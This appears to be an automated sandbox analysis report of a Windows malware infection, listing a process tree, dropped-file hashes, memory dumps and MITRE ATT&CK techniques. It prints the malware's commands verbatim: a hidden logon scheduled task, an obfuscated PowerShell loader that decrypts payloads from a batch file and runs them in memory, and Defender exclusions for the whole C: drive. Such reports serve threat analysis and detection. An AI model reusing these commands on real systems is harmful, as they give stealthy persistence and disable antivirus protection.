      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_791_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\latencyx791.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:524
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\latencyx791.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4400
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\latencyx791.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3160
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DK2yqtn/8WWLFGdN0SGSXoqb0xwC458hY3mEb0Z8Op4='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Tn8+JuQ0zcIx9j+6ZeLoqQ=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Roaming\latencyx791.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath 'C:\'; .('Add-MpP' + 'reference') -ExclusionProcess 'powershell.exe'
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3160

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c610db3e9bb4338000b876e15117f9a9

SHA1
5aa3716e022f244af4c571cb7b5f9c00d604acad

SHA256
b1130539ce9f0fcfb80494d5b7d49dbeddfba359612730c2eb70509a78c725eb

SHA512
2f2c99ee126d6298d424192c5409d972cd89548a15cf503c54f93e882d1e4c5877c7cd633908a34153fb76acb4faab48d12da42442835ad99dc7e1c7d797c23f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4abdf5877984973df7031e02dcdaa957

SHA1
600bf4203f4cd3201b0595c9bd499d93ea9ebfc4

SHA256
098b34ddc05f4a72404180784dad7fda1f2ed00d408bb76f7fa2ac924efd1cbe

SHA512
f55b463a89a5b57e68b29c7c343b305fd2221bc07a004a5a85404fe4a5d979c657afcafb8fbfaf477ed434a5703014bc7ca3928794f8bc60e243744dee54265d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e9c5f9e7437285aa87e4433bc7e0f9d7

SHA1
2363ddac1155a065a54dc6a0fc307d86bd88246b

SHA256
0cb341e3c6fd873cf50bd24821761efdaec49406557f21db3f1a4ee68796b520

SHA512
7cc866c84540c274e013a0eb453e89a27a52a410923ee28488f9b88d6fd8dad77c6e7e99e1cf97dc6202233a7d093e89bfc22eae3102d50cd83207d98b2f3cb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES356.tmp

Filesize
1KB

MD5
d43ebe2048776f4a6866a4b110b53cb4

SHA1
685348d94bb4a08fc1eb0e1c277c5a55672fe266

SHA256
db0f06f578c0bc7b6ea01cc82cddd4e76c6c78ec2f9943b0a44784edb6434cca

SHA512
be8870b0e22e057a7673da1d42ff87fcc61759d03f77386c607ea69a9b10a2ebd7ad61d257962998e322f5554c761a66e617d21314ec1d07df76a9ce3e57ff3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tuui40l1.whu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\mtxs4qav\mtxs4qav.dll

Filesize
4KB

MD5
22ce8e17e42fd809c859be85e044d053

SHA1
a98b143ac3e789c47c690919d144115bd010da37

SHA256
45d46cae5352cabcb6401c7fc3d100eaefecff715ecf8d09bd0724edb6304944

SHA512
fbfe7656af2ef3278a695c71e5a55cf7bece3ab817a1c8cf7ca4532217834642c87854bd87079729dfb422db5fb248e9ff3c4e2cde5efb314fb40313f5c2024f

Download Submit
C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
53KB

MD5
eef9239b6e6433e968d7328eb78e5aa4

SHA1
00ea660bb2189b9e43a4fa2c7f971bdee84701f3

SHA256
15587d9e6274cbe0c11a4f3c45f80d677d76b74840cbe53ee77e6387808e48c2

SHA512
8cc45b3dec7c7bf8f4c2f621bfd531a65a6e457f20a5d0bf887afc4eaa6a2364fa59de60ffdf72dc7950b7a7148261783e959d9c3cf28dcc496f1752501d828d

Download Submit
C:\Users\Admin\AppData\Roaming\latencyx791.vbs

Filesize
111B

MD5
020a34e43acfa58665283a10dbcadd38

SHA1
5e7d437c353208bc75c80f9672841a8ba171addd

SHA256
d484d1089d5eed2ba62da81a835fce4e0bdaabc126a7c35e6bdb0792be522c82

SHA512
98a079aaf8967bbbd8eff3cf784110591a2ba6bd9474cafc076fca56f8bf65c44417eee530d5e8671cb8abae1086fddc7568eb6229c39386a44ad8dd104cdd4c

Download Submit
C:\windows\temp\oqwqvgfx.inf

Filesize
687B

MD5
99fdcef63da22bd2d90299ebd3830493

SHA1
15c9313961d29d25938a9a1279cd484611c6f4f9

SHA256
9872a418ded853162e67f6054b17d6abdcd9f5bdac087d262a5f2604a61e797b

SHA512
fb1f13444fd6ae5b692f496481a9601de231ef542ca638c0a21653184fffe5a650c64bea35808d021ec9356808a7f0873a8e908ec2ccdbdc01a321f24e752d66

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mtxs4qav\CSC14955CEFC1A24FF985C145702B55CC.TMP

Filesize
652B

MD5
df3c7d3c624158f3c3330107b70b9a73

SHA1
dcc1b0297edbb24fb9c5a4adb396787b2a564fb7

SHA256
52e01edb9151243a1c0a38ef65894f003f228373b1d1216421beac6023ac66af

SHA512
033c6ef3c386f8eb97123fa5e38f193577f1166d6fa43e0b7a69714f02a0d3f70d17b585633996a71f570c2d802234722511041d606d49e2dd8dd555269120ac

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mtxs4qav\mtxs4qav.0.cs

Filesize
2KB

MD5
da774b7c7335bf78596f22c13b46a80c

SHA1
43d248947111e2d943aa1c77df51fd5192e92797

SHA256
da5feb1c361cdfd307e18c753790933d18968da7a5de454a2fae3d9dd5e1fba8

SHA512
9c8efab5895c50069512e56b4efc81547f70092064cad8cf526a77f087dace036e876e4da5178d30be213b0c3d9214ef660920c6eff2c7474e5a6d47dfea40d0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mtxs4qav\mtxs4qav.cmdline

Filesize
369B

MD5
ea8728074d73928c716cf80b1b2bd6ce

SHA1
27e59a3706b271cd429677a69c6e8f685ed8c806

SHA256
9906a2b184d60e6d1294d4d848f2d64be9f73e231ead07c3806b73dc9991607f

SHA512
0e3e1c66eb75fbfbb9ea9bf61d2bf7f6242fff90681161b3557e66f59067b71f881c689cd565180431e2eba84c23490eb3013992caf021363b508bed844f3284

Download Submit
memory/436-68-0x0000000005DF0000-0x0000000005E56000-memory.dmp

Filesize
408KB

Download
memory/436-85-0x00000000077F0000-0x000000000788C000-memory.dmp

Filesize
624KB

Download
memory/436-87-0x0000000008A00000-0x0000000008FA4000-memory.dmp

Filesize
5.6MB

Download
memory/436-86-0x00000000077E0000-0x00000000077EE000-memory.dmp

Filesize
56KB

Download
memory/436-84-0x0000000006B20000-0x0000000006B28000-memory.dmp

Filesize
32KB

Download
memory/436-83-0x0000000006AF0000-0x0000000006B0A000-memory.dmp

Filesize
104KB

Download
memory/436-64-0x0000000002C20000-0x0000000002C56000-memory.dmp

Filesize
216KB

Download
memory/436-65-0x00000000057C0000-0x0000000005DE8000-memory.dmp

Filesize
6.2MB

Download
memory/436-66-0x0000000005680000-0x00000000056A2000-memory.dmp

Filesize
136KB

Download
memory/436-67-0x0000000005720000-0x0000000005786000-memory.dmp

Filesize
408KB

Download
memory/436-82-0x0000000007DD0000-0x000000000844A000-memory.dmp

Filesize
6.5MB

Download
memory/436-78-0x0000000006020000-0x0000000006374000-memory.dmp

Filesize
3.3MB

Download
memory/436-80-0x0000000006530000-0x000000000654E000-memory.dmp

Filesize
120KB

Download
memory/436-81-0x00000000065E0000-0x000000000662C000-memory.dmp

Filesize
304KB

Download
memory/524-110-0x00000000076B0000-0x0000000007753000-memory.dmp

Filesize
652KB

Download
memory/524-109-0x0000000006A50000-0x0000000006A6E000-memory.dmp

Filesize
120KB

Download
memory/524-113-0x00000000079C0000-0x00000000079D1000-memory.dmp

Filesize
68KB

Download
memory/524-112-0x0000000007A40000-0x0000000007AD6000-memory.dmp

Filesize
600KB

Download
memory/524-99-0x00000000711A0000-0x00000000711EC000-memory.dmp

Filesize
304KB

Download
memory/524-111-0x0000000007840000-0x000000000784A000-memory.dmp

Filesize
40KB

Download
memory/524-98-0x0000000007670000-0x00000000076A2000-memory.dmp

Filesize
200KB

Download
memory/3064-22-0x000001EC6AB60000-0x000001EC6AB7C000-memory.dmp

Filesize
112KB

Download
memory/3064-35-0x000001EC6AB90000-0x000001EC6AB98000-memory.dmp

Filesize
32KB

Download
memory/3124-139-0x00000000077C0000-0x0000000007828000-memory.dmp

Filesize
416KB

Download
memory/3124-134-0x0000000007400000-0x0000000007412000-memory.dmp

Filesize
72KB

Download
memory/3124-140-0x00000000078F0000-0x000000000790E000-memory.dmp

Filesize
120KB

Download
memory/3124-141-0x0000000008790000-0x0000000008822000-memory.dmp

Filesize
584KB

Download
memory/3124-138-0x0000000007840000-0x00000000078B6000-memory.dmp

Filesize
472KB

Download
memory/3948-52-0x00007FFB253C3000-0x00007FFB253C5000-memory.dmp

Filesize
8KB

Download
memory/3948-1-0x0000023D68090000-0x0000023D680B2000-memory.dmp

Filesize
136KB

Download
memory/3948-11-0x00007FFB253C0000-0x00007FFB25E81000-memory.dmp

Filesize
10.8MB

Download
memory/3948-12-0x00007FFB253C0000-0x00007FFB25E81000-memory.dmp

Filesize
10.8MB

Download
memory/3948-0-0x00007FFB253C3000-0x00007FFB253C5000-memory.dmp

Filesize
8KB

Download
memory/3948-53-0x00007FFB253C0000-0x00007FFB25E81000-memory.dmp

Filesize
10.8MB

Download
memory/3948-59-0x00007FFB253C0000-0x00007FFB25E81000-memory.dmp

Filesize
10.8MB

Download